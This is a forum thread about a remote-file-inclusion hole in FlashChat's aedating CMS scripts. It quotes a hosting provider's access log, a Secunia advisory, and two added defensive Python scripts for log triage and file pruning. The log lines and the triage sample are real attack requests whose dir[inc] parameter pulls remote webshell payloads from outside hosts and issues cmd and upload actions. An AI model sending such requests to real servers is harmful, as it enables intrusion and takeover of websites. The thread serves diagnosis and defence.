Flash Chat Proves Dangerous!


Streder
03-14-2009, 02:12 PM
Good morning.


I would like to first state that I have been using FlashChat quite successfully for some time. And now there is an issue that has disallowed me from using it altogether.

Someone is getting in through the chat and planting a sub site on the server that leads to a virus - I want to share with you the letter from my hosting provider:

Hello,

According to these logs your forum/chat script is being exploited heavily. You will need to update or remove this script from your account in order to prevent the hack. I've scanned your account for any PHP shells that may have been leftover.


187.24.133.35 /forum/chat/inc/cmses/form2.php?http://statesidelogistics.com/images/cliente.php?&action=cmd&chdir=/home/streder/public_html/forum/chat/inc/cmses/ 200
187.24.133.35 /forum/chat/inc/cmses/aedatingCMS2.php/chat/inc/cmses/aedatingCMS2.php?dir[inc]=http://63.249.200.230/diabolick.gif?&action=cmd&chdir=/home/streder/public_html/ 200
187.24.133.35 /forum/chat/inc/cmses/aedatingCMS2.php/chat/inc/cmses/aedatingCMS2.php?dir[inc]=http://63.249.200.230/diabolick.gif?&action=upload&chdir=/home/streder/public_html/ 200
187.24.133.35 /forum/chat/inc/cmses/aedatingCMS2.php/chat/inc/cmses/aedatingCMS2.php?dir[inc]=http://63.249.200.230/diabolick.gif? 200
187.24.133.35 /forum/chat/inc/cmses/aedatingCMS2.php/chat/inc/cmses/aedatingCMS.php?dir[inc]=http://63.249.200.230/diabolick.gif? 200
187.24.133.35 /forum/chat/inc/cmses/aedatingCMS2.php/chat/inc/cmses/aedating4CMS.php?dir[inc]=http://63.249.200.230/diabolick.gif? 200
187.24.133.35 /forum/chat/inc/cmses/aedatingCMS2.php/chat/inc/cmses/aedatingCMS2.php?dir[inc]=http://63.249.200.230/diabolick.gif?&action=upload&chdir=/home/streder/public_html/forum/chat/inc/cmses/ 200
187.24.133.35 /forum/chat/inc/cmses/aedatingCMS2.php/chat/inc/cmses/aedatingCMS2.php?dir[inc]=http://63.249.200.230/diabolick.gif??http://packs.by.ru/cmd/cmd2.gif?&action=cmd&chdir=/home/streder/public_html/ 200
187.24.133.35 /forum/chat/inc/cmses/aedatingCMS2.php/chat/inc/cmses/aedatingCMS2.php?dir[inc]=http://63.249.200.230/diabolick.gif?&action=cmd&chdir=/home/streder/public_html/ 200
187.24.133.35 /forum/chat/inc/cmses/aedatingCMS2.php/chat/inc/cmses/aedatingCMS2.php?dir[inc]=http://63.249.200.230/diabolick.gif?&action=cmd&chdir=/home/streder/public_html/ 200
187.24.133.35 /forum/chat/inc/cmses/aedatingCMS2.php/chat/inc/cmses/aedatingCMS2.php?dir[inc]=http://63.249.200.230/diabolick.gif?&action=cmd&chdir=/home/streder/public_html/ 200
187.24.133.35 /forum/chat/inc/cmses/aedatingCMS2.php/chat/inc/cmses/aedatingCMS2.php?dir[inc]=http://63.249.200.230/diabolick.gif?&action=cmd&chdir=/home/streder/public_html/ 200
187.25.146.122 /forum/chat/inc/cmses/aedatingCMS2.php/chat/inc/cmses/aedatingCMS2.php?dir[inc]=http://63.249.200.230/diabolick.gif??http://packs.by.ru/cmd/cmd2.gif?&action=cmd&chdir=/home/streder/public_html/ 200
187.25.146.122 /forum/chat/inc/cmses/aedatingCMS2.php/chat/inc/cmses/aedatingCMS2.php?dir[inc]=http://63.249.200.230/diabolick.gif??http://packs.by.ru/cmd/cmd2.gif?&action=cmd&chdir=/home/streder/public_html/ 200
187.25.146.122 /forum/chat/inc/cmses/aedatingCMS2.php/chat/inc/cmses/aedatingCMS2.php?dir[inc]=http://63.249.200.230/diabolick.gif??http://packs.by.ru/cmd/cmd2.gif?&action=cmd&chdir=/home/streder/public_html/ 200

Unless someone can suggest how I can fix this security issue, I will no longer be able to use the chat, and that makes me very sad.

Darren, any ideas?

I really want to be able to continue with your chat!

Thanks,

Steven
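As an added example (not part of the original post, not FlashChat code, and not from the hosting provider), the script below runs the provider's detection rules over log lines of the shape shown in the letter above: a client address, the request path with its query string, and the HTTP status. The first three sample lines are copied from the excerpt; the last two are constructed benign requests so the rules have something to ignore. The three flagged script names are taken from the Secunia advisory quoted further down the thread; everything else (rule names, the `source_ips`/`payload_hosts` helpers) is this example's own choice.

```python
"""Triage access-log lines for the FlashChat dir[inc] RFI / webshell pattern.

Added example; not FlashChat code and not from the hosting provider.
Input shape is the provider's excerpt: "<client ip> <path?query> <status>".
"""
import re
from urllib.parse import parse_qsl

# Script basenames named in the Secunia advisory quoted further down the thread.
KNOWN_BAD_SCRIPTS = {"aedatingCMS.php", "aedatingCMS2.php", "aedating4CMS.php"}
# Parameter content that would make include() fetch remote code.
URL_RE = re.compile(r"(?i)\b(?:https?|ftp)://")
HOST_RE = re.compile(r"(?i)\b(?:https?|ftp)://([^/?&\s]+)")
# The attacker's "action" values seen in the excerpt (shell command / file upload).
SHELL_ACTIONS = {"cmd", "upload"}
LINE_RE = re.compile(r"^(\S+)\s+(\S+)\s+(\d{3})$")

# Constructed sample: the first three lines are from the provider's excerpt above,
# the last two are made-up benign requests (10.0.0.x addresses are not from the thread).
SAMPLE_LOG = """\
187.24.133.35 /forum/chat/inc/cmses/form2.php?http://statesidelogistics.com/images/cliente.php?&action=cmd&chdir=/home/streder/public_html/forum/chat/inc/cmses/ 200
187.24.133.35 /forum/chat/inc/cmses/aedatingCMS2.php/chat/inc/cmses/aedatingCMS2.php?dir[inc]=http://63.249.200.230/diabolick.gif?&action=upload&chdir=/home/streder/public_html/ 200
187.25.146.122 /forum/chat/inc/cmses/aedatingCMS2.php/chat/inc/cmses/aedatingCMS2.php?dir[inc]=http://63.249.200.230/diabolick.gif??http://packs.by.ru/cmd/cmd2.gif?&action=cmd&chdir=/home/streder/public_html/ 200
10.0.0.5 /forum/chat/inc/cmses/aedatingCMS2.php?dir[inc]=inc/cmses 200
10.0.0.6 /forum/chat/index.php?page=about 200
"""


def parse_line(line):
    """Split one log line into ip/path/query/status; None if the line has another shape."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ip, request, status = m.groups()
    path, _, query = request.partition("?")
    return {"ip": ip, "path": path, "query": query, "status": int(status)}


def classify(path, query):
    """Return the list of reasons a request looks like the attack; empty means clean."""
    reasons = []
    # The excerpt shows the script name repeated via PATH_INFO
    # (.../aedatingCMS2.php/chat/inc/cmses/aedatingCMS2.php), so test every path segment.
    if any(seg in KNOWN_BAD_SCRIPTS for seg in path.split("/")):
        reasons.append("known-vulnerable aedating CMS script")
    # keep_blank_values keeps the nameless "form2.php?http://...?&action=cmd" form as a key.
    params = parse_qsl(query, keep_blank_values=True)
    if any(URL_RE.search(k) or URL_RE.search(v) for k, v in params):
        reasons.append("URL passed as a parameter (remote file inclusion attempt)")
    if any(k == "action" and v in SHELL_ACTIONS for k, v in params):
        reasons.append("webshell-style action=cmd/upload")
    return reasons


def triage(log_text):
    """Run classify() over every parseable line and keep the hits."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        reasons = classify(rec["path"], rec["query"])
        if reasons:
            # A 200 only says the script answered, not whether the include succeeded:
            # the disk still has to be searched for dropped files either way.
            findings.append({"ip": rec["ip"], "path": rec["path"], "status": rec["status"],
                             "reasons": reasons,
                             "hosts": sorted(set(HOST_RE.findall(rec["query"])))})
    return findings


def source_ips(findings):
    """Client addresses worth blocking or correlating with other logs."""
    return sorted({f["ip"] for f in findings})


def payload_hosts(findings):
    """Remote hosts the payloads were fetched from; egress-block and hunt for them."""
    return sorted({h for f in findings for h in f["hosts"]})


if __name__ == "__main__":
    hits = triage(SAMPLE_LOG)
    for f in hits:
        print(f["ip"], f["path"], "; ".join(f["reasons"]))
    print("sources:", source_ips(hits))
    print("payload hosts:", payload_hosts(hits))
```

Any request that touches one of the three advisory scripts is reported even without a URL in it (the constructed `10.0.0.5` line), because once the file is known to be on disk every hit on it deserves a look; the benign `index.php` request produces no finding.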

Streder
03-14-2009, 02:14 PM
Also, please scan your servers for a folder called bradesco.com.br - this is the folder holding the sub site that leads to the virus.

S

Streder
03-14-2009, 02:25 PM
Also, I should note this was running under version 505

S

klj2000
03-14-2009, 02:32 PM
Everything is pointing to the aedating CMS files. I believe these were an issue at one point, when Darren just renamed them with a .bak extension, and in later versions these files have been removed. So you can remove any files that relate to aedating from the chat/inc/cmses folder.

Paul M
03-14-2009, 08:38 PM
Those unsafe aedating files date from over two years ago (and were updated at the time of the exploit to stop the remote file inclusion). How on earth did they get back into the release?

Veronica
03-14-2009, 09:36 PM
Looking at the different FlashChat releases I have saved, the aedating CMS scripts, in their insecure 2005 versions, have been available since the initial release of FlashChat version 5 in June 2008, and they were removed from the download with version 5.0.9 in mid November 2008 :D

Using these early FlashChat version 5 releases and updating to newer versions by uploading the new script files will NOT remove these insecure aedating CMS script files, which will result in FlashChat version 5.0.10 releases being insecure too :D

Darren might have a good explanation why this has happened

Veronica
03-15-2009, 06:42 AM
This vulnerability was reported 2006-09-04, before FlashChat 4.6.2,
and is now back in FlashChat version 5 :D

http://secunia.com/advisories/21756/

Description:
Multiple PHP remote file inclusion vulnerabilities in FlashChat before 4.6.2
allow remote attackers to execute arbitrary PHP code via a URL
in the dir[inc] parameter in
(1) inc/cmses/aedatingCMS.php,
(2) inc/cmses/aedatingCMS2.php, or
(3) inc/cmses/aedating4CMS.php.

Streder
03-15-2009, 10:30 PM
Just to let you know - I updated to the latest version and so far have had no issues - I also changed the name of the folder the chat resides in.

I will continue to monitor for any issues, and will let you know if anything comes up.

S

rhuckle
03-16-2009, 03:18 PM
Another good idea would be, once the install has been done, to delete all cmses files not used by the chat from that folder and leave only the ones being used. I remove the ones I don't need and so far I have not had the issue above in quite some time.
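Veronica's point that uploading a newer release over an old one leaves the old files in place, and rhuckle's advice to delete the cmses adapters you don't use, as an added example (not part of the thread and not FlashChat's own code): a Python script that audits chat/inc/cmses/ against an allow-list of the adapter you actually use and removes everything else, which also sweeps up anything an attacker dropped there (the provider's excerpt shows `action=upload` with `chdir` pointing into that very folder). Assumptions: the adapter names in the demo (`exampleforumCMS.php`, `otherCMS.php`) are made up; only the three aedating names come from the advisory quoted above; and you know which adapter your chat configuration points at, since the thread does not say where that is set.

```python
"""Prune chat/inc/cmses/ to the adapter actually in use.

Added example, not FlashChat's own code. Run with dry_run=True first.
"""
import tempfile
from pathlib import Path

# Adapter scripts the Secunia advisory quoted above names as remote-file-inclusion sinks.
VULNERABLE = {"aedatingCMS.php", "aedatingCMS2.php", "aedating4CMS.php"}


def audit_cmses(cmses_dir, keep):
    """Return (remove, kept, missing): names to delete, allow-listed names present,
    and allow-listed names that are absent (a sign you pointed at the wrong folder)."""
    cmses_dir = Path(cmses_dir)
    keep = set(keep)
    remove, kept = [], []
    for p in sorted(cmses_dir.iterdir(), key=lambda q: q.name):
        if not p.is_file():
            continue
        # A renamed copy (aedatingCMS2.php.bak) no longer runs as PHP, but it is still
        # source served to anyone who asks for it, and an upgrade-by-upload won't remove it.
        # Allow-listing a vulnerable name is refused here and surfaces as "missing" below.
        vulnerable_lineage = any(p.name.startswith(v) for v in VULNERABLE)
        if p.name in keep and not vulnerable_lineage:
            kept.append(p.name)
        else:
            remove.append(p.name)
    missing = sorted(keep - set(kept))
    return remove, kept, missing


def prune_cmses(cmses_dir, keep, dry_run=True):
    """Delete everything audit_cmses() marks for removal; refuse to act if the allow-list
    doesn't match the folder. Returns the names removed (or that would be removed)."""
    remove, kept, missing = audit_cmses(cmses_dir, keep)
    if missing:
        raise FileNotFoundError(f"allow-listed adapters not found in {cmses_dir}: {missing}")
    if not dry_run:
        for name in remove:
            (Path(cmses_dir) / name).unlink()
    return remove


def demo():
    """Build a throwaway folder mimicking an upgraded-in-place install and prune it."""
    with tempfile.TemporaryDirectory() as tmp:
        cmses = Path(tmp) / "chat" / "inc" / "cmses"
        cmses.mkdir(parents=True)
        # Constructed stand-ins; only the aedating names are real file names from the advisory.
        for name in ["exampleforumCMS.php", "otherCMS.php", "aedatingCMS.php",
                     "aedatingCMS2.php.bak", "aedating4CMS.php"]:
            (cmses / name).write_text("<?php // placeholder\n")
        removed = prune_cmses(cmses, keep={"exampleforumCMS.php"}, dry_run=False)
        remaining = sorted(p.name for p in cmses.iterdir())
        return removed, remaining


if __name__ == "__main__":
    print(demo())
```

Run it against the real folder with the default `dry_run=True` and read the list before deleting; the `missing` check exists so a typo in the allow-list or a wrong path fails loudly instead of emptying the directory your chat depends on.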